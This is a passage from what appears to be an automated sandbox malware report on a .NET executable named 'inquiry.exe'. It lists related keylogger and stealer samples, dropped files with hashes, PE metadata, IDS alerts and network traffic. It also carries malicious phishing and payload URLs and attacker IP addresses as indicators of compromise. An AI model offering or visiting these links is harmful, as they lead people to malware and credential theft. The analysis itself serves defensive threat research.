	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2F%63%61%73%61%64%65%72%65%73%74%61%75%72%61%63%69%6F%6E%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%68%6F%6C%79%2F%69%6E%64%65%78%73%79%6E%31%2E%68%74%6D%6C%23c2FyYWhsQGNkYXRhLmNvbQ==	Get hash	malicious	Unknown	Browse	104.21.34.147
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.21.51.224
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	https://maveuve.github.io/frlpodf/marynewreleasefax.html	Get hash	malicious	Remcos	Browse	104.18.95.41
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	BLHvvl44N0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.206.221
	7Ekgc5sWNB.exe	Get hash	malicious	LummaC	Browse	172.67.132.154
	HHXyi02DYl.exe	Get hash	malicious	Unknown	Browse	104.21.51.224
	https://smky.app/nmmlzm.bin	Get hash	malicious	Unknown	Browse	104.18.24.139
ORACLE-BMC-31898US	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	193.122.6.168
	rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	rBSH200924_pdf.cmd.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	rcontractorder.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
NAMECHEAP-NETUS	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.43
	http://hscpoly.marksbookspace.shop/?/Hscpoly/Hscpoly#Bob.Jenkins@Hscpoly.Com##	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	192.64.119.254
	PO For Bulk Order.exe	Get hash	malicious	FormBook	Browse	199.192.19.19
	CYTAT.exe	Get hash	malicious	FormBook	Browse	63.250.47.40
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.213.249.216
	QlHhDu2uh1.exe	Get hash	malicious	FormBook	Browse	162.0.238.43
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/index.html	Get hash	malicious	Unknown	Browse	199.192.20.176
	https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/	Get hash	malicious	Unknown	Browse	199.192.20.176
	https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN	Get hash	malicious	Unknown	Browse	199.192.20.176

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.96.3
	rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.220
	https://osoulksa.com/c/Fidelityme	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://rkanet.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	NTGcon.msi	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_inquiry.exe_fcd37193b5ccfd31063cfc5e26036f533c63e7_61dfa667_12bae591-e693-4c4a-bc4a-498c1f3dce62\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1468057182655782
Encrypted:	false
SSDEEP:	192:dZyYY9ojv0UnUFaWBUU/CEibdzuiFKZ24lO8R:OPojcUnUFamUHZzuiFKY4lO8R
MD5:	B5F9071CAE004F69193483B7D4757186
SHA1:	543F739F3D4C3D0974C383EF0E52D89CD6808C8F
SHA-256:	67664094D64EC627CA0A8669055FE9CB7BCE5042899798FC1985DBCA77991FA0
SHA-512:	6311C6F67902AF683AB59AE01083EDF00C098CC6F6AE0EA71B29C43720EF795402EF79F70AFBAD859A43D7F20361C7078761FB9CCAE0C079379A9FB6C28B3CE6
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.5.6.6.2.1.2.8.9.3.3.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.5.6.6.2.2.1.7.9.9.6.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.b.a.e.5.9.1.-.e.6.9.3.-.4.c.4.a.-.b.c.4.a.-.4.9.8.c.1.f.3.d.c.e.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.a.7.4.2.d.1.-.0.3.7.7.-.4.b.8.4.-.b.3.5.f.-.c.6.5.c.b.c.0.9.5.0.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.i.n.q.u.i.r.y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.r.a.n.s.p.o.n.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.c.-.0.0.0.1.-.0.0.1.4.-.e.9.9.4.-.f.8.f.e.6.a.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.8.7.8.5.3.e.9.0.f.6.0.5.6.a.0.6.1.c.8.9.8.f.b.9.d.3.d.a.1.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.1.1.9.7.c.4.c.b.5.7.1.2.0.1.1.6.4.a.f.8.e.2.f.9.8.f.7.8.7.b.e.1.8.9.c.9.a.a.6.3.!.i.n.q.u.i.r.y...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER355F.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Wed Sep 25 16:50:21 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	463621
Entropy (8bit):	3.253260779488554
Encrypted:	false
SSDEEP:	3072:YmTnAWie4FylHMWzrREEhT4KcF/VcSyllnYXvoO+L1CCqa8jpN3+vAMK895cJ:Ykpie/TXO1Yn51qak3QAMK8i
MD5:	45D1D5F3038E8726A68BCB8623069F6F
SHA1:	12AEF31DCB71A01304401B1D965F8B5F6F82FF0E
SHA-256:	86AD349D22745BF7CF043C8CEFD25FCB19806CBE1D4B5BB0A2E3DD541B1BDD41
SHA-512:	14BC82A5A9E5829CB42B58ACC330D8375EEE636724A2FBB37EB9348D0713888346F45708B2FA843A06AD54C6E3B3A23DA705EE84EB9CC38E40BF639F1FC75CED
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......M?.f............t...........p...........$....%......0...(%.......J..............l.......8...........T...........(8..............XB..........DD..............................................................................eJ.......D......Lw......................T...........G?.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37E1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8588
Entropy (8bit):	3.706138253550577
Encrypted:	false
SSDEEP:	192:R6l7wVeJYof76X6YNA5r/Igmfgq8prL89bR6BfoX7m:R6lXJvz6X6YKFggmfgqFRsfb
MD5:	761618DCBC4F79A526A84E4DD1655A3A
SHA1:	BF707A37ECC5E50DA17B67E72CAC76EED0F83957
SHA-256:	0BB44A334F5463887C0DAE913E1BB20EC9AA47909B64A16B4C92B2B6A12081DE
SHA-512:	C6970067464A86D5402EBCCBD9F4855D4D9696B893ACEB9669C2C0EFE0DA0F125A51FFE82E45AA1AE2D980147B370B9B6A65DD416B50D1BBB837060C4BF3AD24
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3820.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4748
Entropy (8bit):	4.501164363166042
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg771I9ReWpW8VYj4Ym8M4JuUAF44qyq853Qcz9Lf7d:uIjfoI7Of7VYJuvqpc5Lf7d
MD5:	9D58AFD828CEA8026415BAC13FE90BEF
SHA1:	6A2330A1920449A83878E345F6418DA47C735AD1
SHA-256:	A2B6A0C287BC1583863C82CFF1B451048A53046297CD180889F6E2CF7CEBC3E2
SHA-512:	7E3664D1D67B3DA7F09B5AAE722B64BEFEEE3C9F6346DD380186EC86435C1E64F2CA2E1719241CA4121BCDAA7FB4BB63BCD513F2B53CB380A31B0DF5B420DD44
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515993" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul/nq/llh:NllUyt
MD5:	AB80AD9A08E5B16132325DF5584B2CBE
SHA1:	F7411B7A5826EE6B139EBF40A7BEE999320EF923
SHA-256:	5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
SHA-512:	9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqad2h4w.n3o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p01ppd1y.4mi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfhh1vkh.5zs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwgituu0.rez.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416709091714586
Encrypted:	false
SSDEEP:	6144:ocifpi6ceLPL9skLmb0mBSWSPtaJG8nAgex285i2MMhA20X4WABlGuNx5+:di58BSWIZBk2MM6AFBLo
MD5:	83BC5390EED194D5479BF913E12BC90A
SHA1:	01C62B0E0F9DDA04760FAC94251950FF7C27E035
SHA-256:	29333C5735A47541207210708FD5FDB5E3B03FEBDA82F63ED3659A33B48D4351
SHA-512:	1FA0512D6727A3FDF8B16CE4030116CDE32E790D861FE5FAC36863D85164FC386BBFCD9D13DFF8AC9399D8BBDD294EF96AC613467FE3AFA6CB4A752E41A4CFB4
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.d..k...............................................................................................................................................................................................................................................................................................................................................g..5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.703644365642738
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	inquiry.exe
File size:	1'399'327 bytes
MD5:	e645b187588a20e886416884000446db
SHA1:	1197c4cb571201164af8e2f98f787be189c9aa63
SHA256:	32bb184d40c1cd31619acef73c72cff265023617438eedc0890da62b50f6ff98
SHA512:	7fcd283afbf2cc2d505b80decc18ad9fe1cdeef2fbd8edd223c957a7ada6e76090ee4743023f84c50453b858b565bd28ba739f6c440bd56c57c316fd0b0e26b4
SSDEEP:	24576:ZOSVcy0SVP2ABoxNwmV3p3PWTkhPV6UNqXCosA:ISumstwsYplsA
TLSH:	C5556981B4174CA3FC196236D4DAB8F214FE2D6B76F0195FDF857E1205B213E026A63A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..f.........."...0..8............... ....@...... ..............................gD....`................................

File Icon


Icon Hash:	612541121a4a4d8e

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F2A468 [Tue Sep 24 11:37:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x37fa6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x38b0	0x3a00	bf38fc89b1845420625a941251891e9e	False	0.6383351293103449	data	6.222935935104772	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x37fa6	0x38000	e1636d6550623f717217d6530f169460	False	0.5250723702566964	data	6.1935844883912505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x62c4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 7559 x 7559 px/m	0.6400709219858156
RT_ICON	0x672c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 7559 x 7559 px/m	0.5733606557377049
RT_ICON	0x70b4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 7559 x 7559 px/m	0.5199343339587242
RT_ICON	0x815c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 7559 x 7559 px/m	0.4464730290456432
RT_ICON	0xa704	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 7559 x 7559 px/m	0.3911195087387813
RT_ICON	0xe92c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 7559 x 7559 px/m	0.3689463955637708
RT_ICON	0x13db4	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 7559 x 7559 px/m	0.32725457220937565
RT_ICON	0x1d25c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 7559 x 7559 px/m	0.2950579675854726
RT_ICON	0x2da84	0xff51	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9867811080001836
RT_GROUP_ICON	0x3d9d8	0x84	data	0.7196969696969697
RT_VERSION	0x3da5c	0x360	data	0.41087962962962965
RT_MANIFEST	0x3ddbc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T18:50:26.489574+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49700	158.101.44.242	80	TCP
2024-09-25T18:50:27.715748+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49700	158.101.44.242	80	TCP
2024-09-25T18:50:28.336191+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49707	188.114.96.3	443	TCP
2024-09-25T18:50:29.129943+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49708	158.101.44.242	80	TCP
2024-09-25T18:50:29.699751+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49709	188.114.96.3	443	TCP
2024-09-25T18:50:30.364603+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49710	158.101.44.242	80	TCP
2024-09-25T18:50:30.954344+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49711	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 18:50:12.145860910 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 25, 2024 18:50:14.161592960 CEST	49674	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:14.161619902 CEST	49675	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:14.302109957 CEST	49672	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:16.161919117 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:16.536396980 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:16.958293915 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 25, 2024 18:50:17.286554098 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:18.786478996 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:21.770869970 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 25, 2024 18:50:22.049386978 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:22.059319973 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:22.059781075 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:22.069665909 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:22.078347921 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:23.786469936 CEST	49674	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:23.786473989 CEST	49675	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:23.973956108 CEST	49672	443	192.168.2.7	104.98.116.138
Sep 25, 2024 18:50:24.270399094 CEST	80	49700	158.101.44.242	192.168.2.7
Sep 25, 2024 18:50:24.281910896 CEST	49700	80	192.168.2.7	158.101.44.242
Sep 25, 2024 18:50:24.292211056 CEST	80	49700	158.101.44.242	192.168.2.7
